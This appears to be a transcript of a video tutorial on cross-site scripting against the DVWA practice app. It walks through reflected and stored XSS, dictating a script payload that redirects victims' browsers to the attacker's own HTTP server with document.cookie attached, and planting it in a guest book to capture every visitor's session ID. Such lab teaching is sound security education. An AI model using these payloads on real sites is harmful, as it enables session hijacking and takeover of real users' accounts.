Today we're going to be logging into users' accounts without even using an email or a password. We're going to be using the most straightforward attack, which is cross-site scripting, XSS, which is basically code injection on the client side. Then when a victim opens that site or that browser, the code gets executed. So we put code injection on the link or an input field, and when a victim opens that site or that link, the code gets executed. On this wonderful demo by DVWA, we're going to be talking about two cross-site scripting attacks, reflected and stored. Here, reflected, we have a very simple input field. Hello, what's your name? My name is Who Am I Tang. Submit. Hello, Who Am I Tang. Let's check this out, how it's structured. Input field, input type text, and very basic, and the text here. That tag PRE, hello, who am I Tang. That looks like a vulnerability, but let's check it out. Let's use the tag, the JavaScript tag script alert, which is alert, and then brackets, single column, hacked by who am I Tang, close it off by single column and bracket, then slash script, and then submit. Boom, it is injectable. And then we can see here the alert, hacked by who am I Tang. But you may be thinking, well, how is this a vulnerability? We're just doing alerts on our side. And true, this is not a big vulnerability, but how it can be a vulnerability is I can send this link to whoever I want, and if they paste this link, the alert gets executed. But what a hacker can do is not type alert, but type something like take the cookie, the session ID, and send it to my server, which we're going to be doing now. We're going to be typing here. We're first going to be sorting out our Python server, which is done by Python 3, Python 3 /-m http.server, and then port 8000. We start the server. We go back. We do script location .href, which is a JavaScript command. We force the browser to open this link. Equals double quotes, followed by our Python server HTTP, followed by // then our IP. We can find our IP by doing IPA. Our IP is 10.0.null.2.15, 10.0.2.2.15, then followed by our port 8000. Then we close it off. Then we type then we type question mark. Then we close off the string. Then we do plus. The plus joins the strings together. Then followed by document.cookie. Then we close out the tag /script. Then we press submit. Boom. It looks like nothing happened here, but when we go back to our server, here we can see we got the session ID. So if a hacker takes a link and sends it to a victim, when they open that link, the session ID gets automatically sent to the hacker. But as you can see, we need some type of social engineering, and we need a click from the victim, which is pretty hard to do. But here in stored XSS, it's a way different story. Here we have, for example, a guest book where we do my name, who am I Tang, message, hello, sign guest book, and it gets saved here. As you can see, it's a big vulnerability because in the name we can do who am I Tang, then in the message we can do that same attack, that same command, script location.href equals double quotes, followed by HTTP server, followed by // 10.0.2.15, followed by port. Then we close it off. Question mark. We close off the string. Plus document. Oh, we reached the max character, but we don't really care much about that. We can just go here. Boom. Max length. Let's change the max length to 500. No one really cares. Document, and we can keep typing document.cookie. Then we close off the script by /script, and then 1, 2, 3, we send it. Boom. Going back to our server, we can see here, right here, the session ID. And then whoever opens this link, we will get their session ID because it's stored in the guest book.